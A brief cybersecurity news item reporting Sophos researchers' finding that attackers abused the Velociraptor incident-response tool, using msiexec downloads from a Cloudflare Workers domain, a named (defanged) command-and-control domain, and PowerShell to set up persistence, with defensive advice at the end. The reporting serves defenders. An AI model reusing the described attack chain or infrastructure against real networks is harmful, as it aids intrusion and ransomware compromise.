Organisations warned to be wary of suspicious tunnelling activity and service installations.
Open-source digital forensics and incident response tool Velociraptor has been exploited to remotely compromise a targeted network
According to an analysis from Sophos' Counter Threat Unit and reported by GBHackers News, threat actors leveraged the Windows msiexec utility to download another installer from a Cloudflare Workers domain, leading to Velociraptor deployment.
After configuring Velociraptor to communicate with the 'velo[.]qaubctgg[.]workers[.]dev' command-and-control domain, attackers proceeded to download Visual Studio Code through a PowerShell command while installing another executable for persistence before invoking msiexec for further malware downloads.
With illicit Velociraptor usage indicative of subsequent ransomware compromise, organisations should not only be wary of suspicious tunnelling activity and service installations but also adopt endpoint detection and response systems to better examine potentially malicious actions, said Sophos CTU researchers.
Written by
Dan Raywood is a B2B journalist with 25 years of experience, including covering cybersecurity for the past 17 years. He has extensively covered topics from Advanced Persistent Threats and nation-state hackers to major data breaches and regulatory changes.
He has spoken at events including 44CON, Infosecurity Europe, RANT Forum, BSides Scotland, Steelcon and the National Cyber Security Show, and served as editor of SC Media UK, Infosecurity Magazine and IT Security Guru. He was also an analyst with 451 Research and a product marketing lead at Tenable.
